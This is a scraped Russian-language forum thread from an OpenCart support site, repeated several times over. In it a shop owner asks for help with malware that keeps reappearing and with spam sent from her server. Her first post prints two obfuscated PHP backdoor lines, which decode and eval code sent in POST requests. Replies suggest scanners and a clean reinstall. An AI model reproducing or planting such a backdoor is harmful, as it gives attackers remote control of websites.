hitball Опубліковано: 15 травня 2015 Share Опубліковано: 15 травня 2015 Здравствуйте, уважаемая поддержка! Регулярно на сайте появляется вредоносный код, хостеру жалуются на рассылку спама с нашего сервера. Количество писем доходит до 20000, постепенно они превращаются в мертвые. Код такого плана добавляется в файлы сайта, но многие файлы он создает сам! <?php $sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);if (isset(${$s20}['na82bec'])) {eval($s21(${$s20}['na82bec']));}?> <?php $sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);if (isset(${$s20}['n538c51'])) {eval($s21(${$s20}['n538c51']));}?><?php // Heading $_['heading_title'] = 'Приветствие'; ?> Файлы и код появляются хаотично по всему сайту. К примеру сегодня удалила из папок image, vqmod, system, catalog примерно 30 кусков этого кода. Магазин ocStore Version 1.5.4.1 Очень много стоит модулей. Помогите понять в чем проблема, пока нас не попросили с хостинга((( Надіслати Поділитися на інших сайтах More sharing options...
Tom Опубліковано: 15 травня 2015 Share Опубліковано: 15 травня 2015 Первая и основная причина,здравствуй варез и с ним все вирусы... Вторая менее вероятная,наличие по соседству WP или Joomla. Надіслати Поділитися на інших сайтах More sharing options... hitball Опубліковано: 15 травня 2015 Автор Share Опубліковано: 15 травня 2015 WP и Joomla нет. Остается варез. Как проверить. что из модулей может быть варезом? Надіслати Поділитися на інших сайтах More sharing options... xds Опубліковано: 15 травня 2015 Share Опубліковано: 15 травня 2015 WP и Joomla нет. Остается варез. Как проверить. что из модулей может быть варезом? :-D то что стоит денег, а вы решили взять бесплатно на сомнительных сайтах и есть варез https://ru.wikipedia.org/wiki/%D0%92%D0%B0%D1%80%D0%B5%D0%B7 Надіслати Поділитися на інших сайтах More sharing options... hitball Опубліковано: 15 травня 2015 Автор Share Опубліковано: 15 травня 2015 это понятно, но не все модули ставила я... Как определить, что из модулей варез? Я так понимаю, что проблема в этих файлах. И если удалить эти ворованные модули, то вирусы тоже не будут закачиваться? Надіслати Поділитися на інших сайтах More sharing options... Гість Опубліковано: 15 травня 2015 Share Опубліковано: 15 травня 2015 не факт. Ваши файлы системные уже скорее всего заражены. Для начала можете сравнивать с файлами установщика в папке - system/library , так же проверьте htaccess, и пересмотрите папку vqmod/xml/ Надіслати Поділитися на інших сайтах More sharing options... pashast Опубліковано: 15 травня 2015 Share Опубліковано: 15 травня 2015 Этим пройдитесь http://revisium.com/ai/ , обычно все находит. Надіслати Поділитися на інших сайтах More sharing options... hitball Опубліковано: 15 травня 2015 Автор Share Опубліковано: 15 травня 2015 pashast, сейчас проверяю virusdie это ведь по сути то же самое? timedontwait, спасибо, сейчас сравню. Надіслати Поділитися на інших сайтах More sharing options... Гість Опубліковано: 15 травня 2015 Share Опубліковано: 15 травня 2015 Да поддерживаю aibolit используйте. Толковая утилита Надіслати Поділитися на інших сайтах More sharing options... hitball Опубліковано: 15 травня 2015 Автор Share Опубліковано: 15 травня 2015 не вышло у меня запустить айболит с сервера к сожалению( ребята, подскажите, есть ли в исходных файлах строки, которые содержат eval, base64_decode, gzinflate или str_rot13? может по этим словам поискать? Надіслати Поділитися на інших сайтах More sharing options... Tom Опубліковано: 15 травня 2015 Share Опубліковано: 15 травня 2015 Ситуация ваша плачевная.И сколько бы вам тут не давали ссылок на разных айболитов,100% гарантии что вылечите всё нет .Пробуйте восстановить файлы из бэкапа на хостинге.Впредь знайте,что весь бесплатный сыр,как правило в мышеловках. Надіслати Поділитися на інших сайтах More sharing options... hitball Опубліковано: 15 травня 2015 Автор Share Опубліковано: 15 травня 2015 Tom, та да. Вот ругались на этих паразитов: "Мы работали, работали, а паршивцы пришли и нагадили", а сами по сути так же поступили. Да и в начале всегда пытаешься сэкономить. Ну обожглись - набрались опыта( И в нашей ситуации самое плачевное бэкап тоже заражен( Надіслати Поділитися на інших сайтах More sharing options... Tom Опубліковано: 15 травня 2015 Share Опубліковано: 15 травня 2015 Тогда как по мне ,выход у вас один.Собрать магазин из чистого архива, установить в него только самые нужные модули(естественно не пытаться на авось опять залить варезную халяву). Папку с картинками слейте и прогоните на компе анти-вирусником.Останется только вставить конфиги и проверенную папку с картинками и заменить нынешнего больного,на просветлённого нового)))) Надіслати Поділитися на інших сайтах More sharing options... hitball Опубліковано: 15 травня 2015 Автор Share Опубліковано: 15 травня 2015 Tom, да, это видимо единственный выход( что самое смешное, модули, которыми пользуемся действительно, мы купили, а заливали ерунду какую-то, которой ни разу и не воспользовались( Надіслати Поділитися на інших сайтах More sharing options... chukcha Опубліковано: 15 травня 2015 Share Опубліковано: 15 травня 2015 Айболит не лечит, айболит - экспресс диагностика. Лечат другие средства... Надіслати Поділитися на інших сайтах More sharing options... hitball Опубліковано: 15 травня 2015 Автор Share Опубліковано: 15 травня 2015 chukcha, с радостью выслушаю ваше предложение по лечению сайта Надіслати Поділитися на інших сайтах More sharing options... destreser Опубліковано: 15 травня 2015 Share Опубліковано: 15 травня 2015 Испытайте в боевых условиях http://yandex.ru/promo/manul#about Надіслати Поділитися на інших сайтах More sharing options... hitball Опубліковано: 15 травня 2015 Автор Share Опубліковано: 15 травня 2015 destreser, о пасибки!!! Надіслати Поділитися на інших сайтах More sharing options... hitball Опубліковано: 15 травня 2015 Автор Share Опубліковано: 15 травня 2015 destreser, странный этот антивирус. Ругается на кучу здоровых файлов :ugeek: Надіслати Поділитися на інших сайтах More sharing options... destreser Опубліковано: 15 травня 2015 Share Опубліковано: 15 травня 2015 Значит вручную перебирайте каждый файл. Надіслати Поділитися на інших сайтах More sharing options... hitball Опубліковано: 15 травня 2015 Автор Share Опубліковано: 15 травня 2015 destreser, перелопатила таки все файлы, которые яндекс выдал. и реально нашла несколько мерзких кодов. держу кулачки, чтобы помогло) спасибо вам большое! и всем спасибо за ответы! Надіслати Поділитися на інших сайтах More sharing options... destreser Опубліковано: 16 травня 2015 Share Опубліковано: 16 травня 2015 Код был во всех файлах, которые Манул пометил или только в некоторых? Помечены они были красным или желтым? Надіслати Поділитися на інших сайтах More sharing options... hitball Опубліковано: 16 травня 2015 Автор Share Опубліковано: 16 травня 2015 в основном красным и с пометкой file detected="c" были впрочем и в желтых с пометкой file detected="w" сегодня пока ничего не лезет, очень надеюсь, что помогло! Надіслати Поділитися на інших сайтах More sharing options... agropuls Опубліковано: 20 травня 2015 Share Опубліковано: 20 травня 2015 в основном красным и с пометкой file detected="c" были впрочем и в желтых с пометкой file detected="w" сегодня пока ничего не лезет, очень надеюсь, что помогло! Привет! попробывала Манул. Сканировать не стал - выдал ошибку. А у тебя все получилось с первого раза? Делала все как в инструкции? Надіслати Поділитися на інших сайтах More sharing options... halfhope Опубліковано: 20 травня 2015 Share Опубліковано: 20 травня 2015 Привет! попробывала Манул. Сканировать не стал - выдал ошибку. А у тебя все получилось с первого раза? Делала все как в инструкции? Еще одна инструкция https://opencartforum.com/topic/47034-вирус-плодит-htaccess/?do=findComment&comment=405514 Надіслати Поділитися на інших сайтах More sharing options... Назад 1 2 Вперед Сторінка 1 з 2 Створіть аккаунт або увійдіть для коментування Ви повинні бути користувачем, щоб залишити коментар Створити обліковий запис Зареєструйтеся для отримання облікового запису. Це просто! Зареєструвати аккаунт Вхід Уже зареєстровані? Увійдіть тут. Вхід зараз Share More sharing options... Передплатники 0 Перейти до списку тем Зараз на сторінці 0 користувачів Ні користувачів, які переглядиють цю сторінку Последние темы Последние дополнения Последние новости Вся активність Головна Підтримка та відповіді на запитання. Питання безпеки Каждый день вредоносный код((( Покупцям Оплата розширень фізичними особами Оплата розширень юридичними особами Політика повернень Розробникам Регламент розміщення розширень Регламент продажу та підтримки розширень Віртуальний обліковий запис автора Політика просування оголошень API каталогу розширень Вирішення спорів щодо авторських прав Корисна інформація Публічна оферта Політика повернень Політика конфіденційності Платіжна політика Політика передачі особистих даних Політика прозорості Останні розширення PRICE MASTER - Модуль імпорту/експорту товарів, парсинг, переклад, генерація текстів, редактор каталогу та багато іншого Автор: ScriptBrains 1.0 Синхронізація Замовлень Rozetka.ua та Opencart Автор: sinco Product Manipulator Автор: Hiperlynx007 Видалення дублікатів товарів для OpenCart Автор: Hatshypsut Вибір категорій і виробників для "Знайшли дешевше" шаблону Upstore Автор: Flint2000 × Уже зареєстровані? Ввійти Реєстрація Ваші замовлення Назад Придбані модулі та шаблони Ваші рахунки Лист очікувань Альтернативні контакти Форум Новини ocStore Назад Офіційний сайт Демо ocStore 3.0.3.2 Демо ocStore 2.3.0.2.4 Завантажити ocStore Документація Історія версій ocStore Блоги Модулі Шаблони Назад Безкоштовні шаблони Платні шаблони Де купувати модулі? Послуги FAQ OpenCart.Pro Назад Демо Купити Порівняння × Створити... Important Information На нашому сайті використовуються файли cookie і відбувається обробка деяких персональних даних користувачів, щоб поліпшити користувальницький інтерфейс. Щоб дізнатися для чого і які персональні дані ми обробляємо перейдіть за посиланням . Якщо Ви натиснете «Я даю згоду», це означає, що Ви розумієте і приймаєте всі умови, зазначені в цьому Повідомленні про конфіденційність. Я даю згоду
hitball Опубліковано: 15 травня 2015 Автор Share Опубліковано: 15 травня 2015 WP и Joomla нет. Остается варез. Как проверить. что из модулей может быть варезом? Надіслати Поділитися на інших сайтах More sharing options...
xds Опубліковано: 15 травня 2015 Share Опубліковано: 15 травня 2015 WP и Joomla нет. Остается варез. Как проверить. что из модулей может быть варезом? :-D то что стоит денег, а вы решили взять бесплатно на сомнительных сайтах и есть варез https://ru.wikipedia.org/wiki/%D0%92%D0%B0%D1%80%D0%B5%D0%B7 Надіслати Поділитися на інших сайтах More sharing options... hitball Опубліковано: 15 травня 2015 Автор Share Опубліковано: 15 травня 2015 это понятно, но не все модули ставила я... Как определить, что из модулей варез? Я так понимаю, что проблема в этих файлах. И если удалить эти ворованные модули, то вирусы тоже не будут закачиваться? Надіслати Поділитися на інших сайтах More sharing options... Гість Опубліковано: 15 травня 2015 Share Опубліковано: 15 травня 2015 не факт. Ваши файлы системные уже скорее всего заражены. Для начала можете сравнивать с файлами установщика в папке - system/library , так же проверьте htaccess, и пересмотрите папку vqmod/xml/ Надіслати Поділитися на інших сайтах More sharing options... pashast Опубліковано: 15 травня 2015 Share Опубліковано: 15 травня 2015 Этим пройдитесь http://revisium.com/ai/ , обычно все находит. Надіслати Поділитися на інших сайтах More sharing options... hitball Опубліковано: 15 травня 2015 Автор Share Опубліковано: 15 травня 2015 pashast, сейчас проверяю virusdie это ведь по сути то же самое? timedontwait, спасибо, сейчас сравню. Надіслати Поділитися на інших сайтах More sharing options... Гість Опубліковано: 15 травня 2015 Share Опубліковано: 15 травня 2015 Да поддерживаю aibolit используйте. Толковая утилита Надіслати Поділитися на інших сайтах More sharing options... hitball Опубліковано: 15 травня 2015 Автор Share Опубліковано: 15 травня 2015 не вышло у меня запустить айболит с сервера к сожалению( ребята, подскажите, есть ли в исходных файлах строки, которые содержат eval, base64_decode, gzinflate или str_rot13? может по этим словам поискать? Надіслати Поділитися на інших сайтах More sharing options... Tom Опубліковано: 15 травня 2015 Share Опубліковано: 15 травня 2015 Ситуация ваша плачевная.И сколько бы вам тут не давали ссылок на разных айболитов,100% гарантии что вылечите всё нет .Пробуйте восстановить файлы из бэкапа на хостинге.Впредь знайте,что весь бесплатный сыр,как правило в мышеловках. Надіслати Поділитися на інших сайтах More sharing options... hitball Опубліковано: 15 травня 2015 Автор Share Опубліковано: 15 травня 2015 Tom, та да. Вот ругались на этих паразитов: "Мы работали, работали, а паршивцы пришли и нагадили", а сами по сути так же поступили. Да и в начале всегда пытаешься сэкономить. Ну обожглись - набрались опыта( И в нашей ситуации самое плачевное бэкап тоже заражен( Надіслати Поділитися на інших сайтах More sharing options... Tom Опубліковано: 15 травня 2015 Share Опубліковано: 15 травня 2015 Тогда как по мне ,выход у вас один.Собрать магазин из чистого архива, установить в него только самые нужные модули(естественно не пытаться на авось опять залить варезную халяву). Папку с картинками слейте и прогоните на компе анти-вирусником.Останется только вставить конфиги и проверенную папку с картинками и заменить нынешнего больного,на просветлённого нового)))) Надіслати Поділитися на інших сайтах More sharing options... hitball Опубліковано: 15 травня 2015 Автор Share Опубліковано: 15 травня 2015 Tom, да, это видимо единственный выход( что самое смешное, модули, которыми пользуемся действительно, мы купили, а заливали ерунду какую-то, которой ни разу и не воспользовались( Надіслати Поділитися на інших сайтах More sharing options... chukcha Опубліковано: 15 травня 2015 Share Опубліковано: 15 травня 2015 Айболит не лечит, айболит - экспресс диагностика. Лечат другие средства... Надіслати Поділитися на інших сайтах More sharing options... hitball Опубліковано: 15 травня 2015 Автор Share Опубліковано: 15 травня 2015 chukcha, с радостью выслушаю ваше предложение по лечению сайта Надіслати Поділитися на інших сайтах More sharing options... destreser Опубліковано: 15 травня 2015 Share Опубліковано: 15 травня 2015 Испытайте в боевых условиях http://yandex.ru/promo/manul#about Надіслати Поділитися на інших сайтах More sharing options... hitball Опубліковано: 15 травня 2015 Автор Share Опубліковано: 15 травня 2015 destreser, о пасибки!!! Надіслати Поділитися на інших сайтах More sharing options... hitball Опубліковано: 15 травня 2015 Автор Share Опубліковано: 15 травня 2015 destreser, странный этот антивирус. Ругается на кучу здоровых файлов :ugeek: Надіслати Поділитися на інших сайтах More sharing options... destreser Опубліковано: 15 травня 2015 Share Опубліковано: 15 травня 2015 Значит вручную перебирайте каждый файл. Надіслати Поділитися на інших сайтах More sharing options... hitball Опубліковано: 15 травня 2015 Автор Share Опубліковано: 15 травня 2015 destreser, перелопатила таки все файлы, которые яндекс выдал. и реально нашла несколько мерзких кодов. держу кулачки, чтобы помогло) спасибо вам большое! и всем спасибо за ответы! Надіслати Поділитися на інших сайтах More sharing options... destreser Опубліковано: 16 травня 2015 Share Опубліковано: 16 травня 2015 Код был во всех файлах, которые Манул пометил или только в некоторых? Помечены они были красным или желтым? Надіслати Поділитися на інших сайтах More sharing options... hitball Опубліковано: 16 травня 2015 Автор Share Опубліковано: 16 травня 2015 в основном красным и с пометкой file detected="c" были впрочем и в желтых с пометкой file detected="w" сегодня пока ничего не лезет, очень надеюсь, что помогло! Надіслати Поділитися на інших сайтах More sharing options... agropuls Опубліковано: 20 травня 2015 Share Опубліковано: 20 травня 2015 в основном красным и с пометкой file detected="c" были впрочем и в желтых с пометкой file detected="w" сегодня пока ничего не лезет, очень надеюсь, что помогло! Привет! попробывала Манул. Сканировать не стал - выдал ошибку. А у тебя все получилось с первого раза? Делала все как в инструкции? Надіслати Поділитися на інших сайтах More sharing options... halfhope Опубліковано: 20 травня 2015 Share Опубліковано: 20 травня 2015 Привет! попробывала Манул. Сканировать не стал - выдал ошибку. А у тебя все получилось с первого раза? Делала все как в инструкции? Еще одна инструкция https://opencartforum.com/topic/47034-вирус-плодит-htaccess/?do=findComment&comment=405514 Надіслати Поділитися на інших сайтах More sharing options... Назад 1 2 Вперед Сторінка 1 з 2 Створіть аккаунт або увійдіть для коментування Ви повинні бути користувачем, щоб залишити коментар Створити обліковий запис Зареєструйтеся для отримання облікового запису. Це просто! Зареєструвати аккаунт Вхід Уже зареєстровані? Увійдіть тут. Вхід зараз Share More sharing options... Передплатники 0 Перейти до списку тем Зараз на сторінці 0 користувачів Ні користувачів, які переглядиють цю сторінку Последние темы Последние дополнения Последние новости Вся активність Головна Підтримка та відповіді на запитання. Питання безпеки Каждый день вредоносный код((( Покупцям Оплата розширень фізичними особами Оплата розширень юридичними особами Політика повернень Розробникам Регламент розміщення розширень Регламент продажу та підтримки розширень Віртуальний обліковий запис автора Політика просування оголошень API каталогу розширень Вирішення спорів щодо авторських прав Корисна інформація Публічна оферта Політика повернень Політика конфіденційності Платіжна політика Політика передачі особистих даних Політика прозорості Останні розширення PRICE MASTER - Модуль імпорту/експорту товарів, парсинг, переклад, генерація текстів, редактор каталогу та багато іншого Автор: ScriptBrains 1.0 Синхронізація Замовлень Rozetka.ua та Opencart Автор: sinco Product Manipulator Автор: Hiperlynx007 Видалення дублікатів товарів для OpenCart Автор: Hatshypsut Вибір категорій і виробників для "Знайшли дешевше" шаблону Upstore Автор: Flint2000 × Уже зареєстровані? Ввійти Реєстрація Ваші замовлення Назад Придбані модулі та шаблони Ваші рахунки Лист очікувань Альтернативні контакти Форум Новини ocStore Назад Офіційний сайт Демо ocStore 3.0.3.2 Демо ocStore 2.3.0.2.4 Завантажити ocStore Документація Історія версій ocStore Блоги Модулі Шаблони Назад Безкоштовні шаблони Платні шаблони Де купувати модулі? Послуги FAQ OpenCart.Pro Назад Демо Купити Порівняння × Створити... Important Information На нашому сайті використовуються файли cookie і відбувається обробка деяких персональних даних користувачів, щоб поліпшити користувальницький інтерфейс. Щоб дізнатися для чого і які персональні дані ми обробляємо перейдіть за посиланням . Якщо Ви натиснете «Я даю згоду», це означає, що Ви розумієте і приймаєте всі умови, зазначені в цьому Повідомленні про конфіденційність. Я даю згоду
hitball Опубліковано: 15 травня 2015 Автор Share Опубліковано: 15 травня 2015 это понятно, но не все модули ставила я... Как определить, что из модулей варез? Я так понимаю, что проблема в этих файлах. И если удалить эти ворованные модули, то вирусы тоже не будут закачиваться? Надіслати Поділитися на інших сайтах More sharing options...
Гість Опубліковано: 15 травня 2015 Share Опубліковано: 15 травня 2015 не факт. Ваши файлы системные уже скорее всего заражены. Для начала можете сравнивать с файлами установщика в папке - system/library , так же проверьте htaccess, и пересмотрите папку vqmod/xml/ Надіслати Поділитися на інших сайтах More sharing options...
pashast Опубліковано: 15 травня 2015 Share Опубліковано: 15 травня 2015 Этим пройдитесь http://revisium.com/ai/ , обычно все находит. Надіслати Поділитися на інших сайтах More sharing options... hitball Опубліковано: 15 травня 2015 Автор Share Опубліковано: 15 травня 2015 pashast, сейчас проверяю virusdie это ведь по сути то же самое? timedontwait, спасибо, сейчас сравню. Надіслати Поділитися на інших сайтах More sharing options... Гість Опубліковано: 15 травня 2015 Share Опубліковано: 15 травня 2015 Да поддерживаю aibolit используйте. Толковая утилита Надіслати Поділитися на інших сайтах More sharing options... hitball Опубліковано: 15 травня 2015 Автор Share Опубліковано: 15 травня 2015 не вышло у меня запустить айболит с сервера к сожалению( ребята, подскажите, есть ли в исходных файлах строки, которые содержат eval, base64_decode, gzinflate или str_rot13? может по этим словам поискать? Надіслати Поділитися на інших сайтах More sharing options... Tom Опубліковано: 15 травня 2015 Share Опубліковано: 15 травня 2015 Ситуация ваша плачевная.И сколько бы вам тут не давали ссылок на разных айболитов,100% гарантии что вылечите всё нет .Пробуйте восстановить файлы из бэкапа на хостинге.Впредь знайте,что весь бесплатный сыр,как правило в мышеловках. Надіслати Поділитися на інших сайтах More sharing options... hitball Опубліковано: 15 травня 2015 Автор Share Опубліковано: 15 травня 2015 Tom, та да. Вот ругались на этих паразитов: "Мы работали, работали, а паршивцы пришли и нагадили", а сами по сути так же поступили. Да и в начале всегда пытаешься сэкономить. Ну обожглись - набрались опыта( И в нашей ситуации самое плачевное бэкап тоже заражен( Надіслати Поділитися на інших сайтах More sharing options... Tom Опубліковано: 15 травня 2015 Share Опубліковано: 15 травня 2015 Тогда как по мне ,выход у вас один.Собрать магазин из чистого архива, установить в него только самые нужные модули(естественно не пытаться на авось опять залить варезную халяву). Папку с картинками слейте и прогоните на компе анти-вирусником.Останется только вставить конфиги и проверенную папку с картинками и заменить нынешнего больного,на просветлённого нового)))) Надіслати Поділитися на інших сайтах More sharing options... hitball Опубліковано: 15 травня 2015 Автор Share Опубліковано: 15 травня 2015 Tom, да, это видимо единственный выход( что самое смешное, модули, которыми пользуемся действительно, мы купили, а заливали ерунду какую-то, которой ни разу и не воспользовались( Надіслати Поділитися на інших сайтах More sharing options... chukcha Опубліковано: 15 травня 2015 Share Опубліковано: 15 травня 2015 Айболит не лечит, айболит - экспресс диагностика. Лечат другие средства... Надіслати Поділитися на інших сайтах More sharing options... hitball Опубліковано: 15 травня 2015 Автор Share Опубліковано: 15 травня 2015 chukcha, с радостью выслушаю ваше предложение по лечению сайта Надіслати Поділитися на інших сайтах More sharing options... destreser Опубліковано: 15 травня 2015 Share Опубліковано: 15 травня 2015 Испытайте в боевых условиях http://yandex.ru/promo/manul#about Надіслати Поділитися на інших сайтах More sharing options... hitball Опубліковано: 15 травня 2015 Автор Share Опубліковано: 15 травня 2015 destreser, о пасибки!!! Надіслати Поділитися на інших сайтах More sharing options... hitball Опубліковано: 15 травня 2015 Автор Share Опубліковано: 15 травня 2015 destreser, странный этот антивирус. Ругается на кучу здоровых файлов :ugeek: Надіслати Поділитися на інших сайтах More sharing options... destreser Опубліковано: 15 травня 2015 Share Опубліковано: 15 травня 2015 Значит вручную перебирайте каждый файл. Надіслати Поділитися на інших сайтах More sharing options... hitball Опубліковано: 15 травня 2015 Автор Share Опубліковано: 15 травня 2015 destreser, перелопатила таки все файлы, которые яндекс выдал. и реально нашла несколько мерзких кодов. держу кулачки, чтобы помогло) спасибо вам большое! и всем спасибо за ответы! Надіслати Поділитися на інших сайтах More sharing options... destreser Опубліковано: 16 травня 2015 Share Опубліковано: 16 травня 2015 Код был во всех файлах, которые Манул пометил или только в некоторых? Помечены они были красным или желтым? Надіслати Поділитися на інших сайтах More sharing options... hitball Опубліковано: 16 травня 2015 Автор Share Опубліковано: 16 травня 2015 в основном красным и с пометкой file detected="c" были впрочем и в желтых с пометкой file detected="w" сегодня пока ничего не лезет, очень надеюсь, что помогло! Надіслати Поділитися на інших сайтах More sharing options... agropuls Опубліковано: 20 травня 2015 Share Опубліковано: 20 травня 2015 в основном красным и с пометкой file detected="c" были впрочем и в желтых с пометкой file detected="w" сегодня пока ничего не лезет, очень надеюсь, что помогло! Привет! попробывала Манул. Сканировать не стал - выдал ошибку. А у тебя все получилось с первого раза? Делала все как в инструкции? Надіслати Поділитися на інших сайтах More sharing options... halfhope Опубліковано: 20 травня 2015 Share Опубліковано: 20 травня 2015 Привет! попробывала Манул. Сканировать не стал - выдал ошибку. А у тебя все получилось с первого раза? Делала все как в инструкции? Еще одна инструкция https://opencartforum.com/topic/47034-вирус-плодит-htaccess/?do=findComment&comment=405514 Надіслати Поділитися на інших сайтах More sharing options... Назад 1 2 Вперед Сторінка 1 з 2 Створіть аккаунт або увійдіть для коментування Ви повинні бути користувачем, щоб залишити коментар Створити обліковий запис Зареєструйтеся для отримання облікового запису. Це просто! Зареєструвати аккаунт Вхід Уже зареєстровані? Увійдіть тут. Вхід зараз Share More sharing options... Передплатники 0 Перейти до списку тем Зараз на сторінці 0 користувачів Ні користувачів, які переглядиють цю сторінку Последние темы Последние дополнения Последние новости Вся активність Головна Підтримка та відповіді на запитання. Питання безпеки Каждый день вредоносный код((( Покупцям Оплата розширень фізичними особами Оплата розширень юридичними особами Політика повернень Розробникам Регламент розміщення розширень Регламент продажу та підтримки розширень Віртуальний обліковий запис автора Політика просування оголошень API каталогу розширень Вирішення спорів щодо авторських прав Корисна інформація Публічна оферта Політика повернень Політика конфіденційності Платіжна політика Політика передачі особистих даних Політика прозорості Останні розширення PRICE MASTER - Модуль імпорту/експорту товарів, парсинг, переклад, генерація текстів, редактор каталогу та багато іншого Автор: ScriptBrains 1.0 Синхронізація Замовлень Rozetka.ua та Opencart Автор: sinco Product Manipulator Автор: Hiperlynx007 Видалення дублікатів товарів для OpenCart Автор: Hatshypsut Вибір категорій і виробників для "Знайшли дешевше" шаблону Upstore Автор: Flint2000 × Уже зареєстровані? Ввійти Реєстрація Ваші замовлення Назад Придбані модулі та шаблони Ваші рахунки Лист очікувань Альтернативні контакти Форум Новини ocStore Назад Офіційний сайт Демо ocStore 3.0.3.2 Демо ocStore 2.3.0.2.4 Завантажити ocStore Документація Історія версій ocStore Блоги Модулі Шаблони Назад Безкоштовні шаблони Платні шаблони Де купувати модулі? Послуги FAQ OpenCart.Pro Назад Демо Купити Порівняння × Створити... Important Information На нашому сайті використовуються файли cookie і відбувається обробка деяких персональних даних користувачів, щоб поліпшити користувальницький інтерфейс. Щоб дізнатися для чого і які персональні дані ми обробляємо перейдіть за посиланням . Якщо Ви натиснете «Я даю згоду», це означає, що Ви розумієте і приймаєте всі умови, зазначені в цьому Повідомленні про конфіденційність. Я даю згоду
hitball Опубліковано: 15 травня 2015 Автор Share Опубліковано: 15 травня 2015 pashast, сейчас проверяю virusdie это ведь по сути то же самое? timedontwait, спасибо, сейчас сравню. Надіслати Поділитися на інших сайтах More sharing options...
Гість Опубліковано: 15 травня 2015 Share Опубліковано: 15 травня 2015 Да поддерживаю aibolit используйте. Толковая утилита Надіслати Поділитися на інших сайтах More sharing options...
hitball Опубліковано: 15 травня 2015 Автор Share Опубліковано: 15 травня 2015 не вышло у меня запустить айболит с сервера к сожалению( ребята, подскажите, есть ли в исходных файлах строки, которые содержат eval, base64_decode, gzinflate или str_rot13? может по этим словам поискать? Надіслати Поділитися на інших сайтах More sharing options...
Tom Опубліковано: 15 травня 2015 Share Опубліковано: 15 травня 2015 Ситуация ваша плачевная.И сколько бы вам тут не давали ссылок на разных айболитов,100% гарантии что вылечите всё нет .Пробуйте восстановить файлы из бэкапа на хостинге.Впредь знайте,что весь бесплатный сыр,как правило в мышеловках. Надіслати Поділитися на інших сайтах More sharing options... hitball Опубліковано: 15 травня 2015 Автор Share Опубліковано: 15 травня 2015 Tom, та да. Вот ругались на этих паразитов: "Мы работали, работали, а паршивцы пришли и нагадили", а сами по сути так же поступили. Да и в начале всегда пытаешься сэкономить. Ну обожглись - набрались опыта( И в нашей ситуации самое плачевное бэкап тоже заражен( Надіслати Поділитися на інших сайтах More sharing options... Tom Опубліковано: 15 травня 2015 Share Опубліковано: 15 травня 2015 Тогда как по мне ,выход у вас один.Собрать магазин из чистого архива, установить в него только самые нужные модули(естественно не пытаться на авось опять залить варезную халяву). Папку с картинками слейте и прогоните на компе анти-вирусником.Останется только вставить конфиги и проверенную папку с картинками и заменить нынешнего больного,на просветлённого нового)))) Надіслати Поділитися на інших сайтах More sharing options... hitball Опубліковано: 15 травня 2015 Автор Share Опубліковано: 15 травня 2015 Tom, да, это видимо единственный выход( что самое смешное, модули, которыми пользуемся действительно, мы купили, а заливали ерунду какую-то, которой ни разу и не воспользовались( Надіслати Поділитися на інших сайтах More sharing options... chukcha Опубліковано: 15 травня 2015 Share Опубліковано: 15 травня 2015 Айболит не лечит, айболит - экспресс диагностика. Лечат другие средства... Надіслати Поділитися на інших сайтах More sharing options... hitball Опубліковано: 15 травня 2015 Автор Share Опубліковано: 15 травня 2015 chukcha, с радостью выслушаю ваше предложение по лечению сайта Надіслати Поділитися на інших сайтах More sharing options... destreser Опубліковано: 15 травня 2015 Share Опубліковано: 15 травня 2015 Испытайте в боевых условиях http://yandex.ru/promo/manul#about Надіслати Поділитися на інших сайтах More sharing options... hitball Опубліковано: 15 травня 2015 Автор Share Опубліковано: 15 травня 2015 destreser, о пасибки!!! Надіслати Поділитися на інших сайтах More sharing options... hitball Опубліковано: 15 травня 2015 Автор Share Опубліковано: 15 травня 2015 destreser, странный этот антивирус. Ругается на кучу здоровых файлов :ugeek: Надіслати Поділитися на інших сайтах More sharing options... destreser Опубліковано: 15 травня 2015 Share Опубліковано: 15 травня 2015 Значит вручную перебирайте каждый файл. Надіслати Поділитися на інших сайтах More sharing options... hitball Опубліковано: 15 травня 2015 Автор Share Опубліковано: 15 травня 2015 destreser, перелопатила таки все файлы, которые яндекс выдал. и реально нашла несколько мерзких кодов. держу кулачки, чтобы помогло) спасибо вам большое! и всем спасибо за ответы! Надіслати Поділитися на інших сайтах More sharing options... destreser Опубліковано: 16 травня 2015 Share Опубліковано: 16 травня 2015 Код был во всех файлах, которые Манул пометил или только в некоторых? Помечены они были красным или желтым? Надіслати Поділитися на інших сайтах More sharing options... hitball Опубліковано: 16 травня 2015 Автор Share Опубліковано: 16 травня 2015 в основном красным и с пометкой file detected="c" были впрочем и в желтых с пометкой file detected="w" сегодня пока ничего не лезет, очень надеюсь, что помогло! Надіслати Поділитися на інших сайтах More sharing options... agropuls Опубліковано: 20 травня 2015 Share Опубліковано: 20 травня 2015 в основном красным и с пометкой file detected="c" были впрочем и в желтых с пометкой file detected="w" сегодня пока ничего не лезет, очень надеюсь, что помогло! Привет! попробывала Манул. Сканировать не стал - выдал ошибку. А у тебя все получилось с первого раза? Делала все как в инструкции? Надіслати Поділитися на інших сайтах More sharing options... halfhope Опубліковано: 20 травня 2015 Share Опубліковано: 20 травня 2015 Привет! попробывала Манул. Сканировать не стал - выдал ошибку. А у тебя все получилось с первого раза? Делала все как в инструкции? Еще одна инструкция https://opencartforum.com/topic/47034-вирус-плодит-htaccess/?do=findComment&comment=405514 Надіслати Поділитися на інших сайтах More sharing options... Назад 1 2 Вперед Сторінка 1 з 2 Створіть аккаунт або увійдіть для коментування Ви повинні бути користувачем, щоб залишити коментар Створити обліковий запис Зареєструйтеся для отримання облікового запису. Це просто! Зареєструвати аккаунт Вхід Уже зареєстровані? Увійдіть тут. Вхід зараз Share More sharing options... Передплатники 0 Перейти до списку тем Зараз на сторінці 0 користувачів Ні користувачів, які переглядиють цю сторінку Последние темы Последние дополнения Последние новости Вся активність Головна Підтримка та відповіді на запитання. Питання безпеки Каждый день вредоносный код((( Покупцям Оплата розширень фізичними особами Оплата розширень юридичними особами Політика повернень Розробникам Регламент розміщення розширень Регламент продажу та підтримки розширень Віртуальний обліковий запис автора Політика просування оголошень API каталогу розширень Вирішення спорів щодо авторських прав Корисна інформація Публічна оферта Політика повернень Політика конфіденційності Платіжна політика Політика передачі особистих даних Політика прозорості Останні розширення PRICE 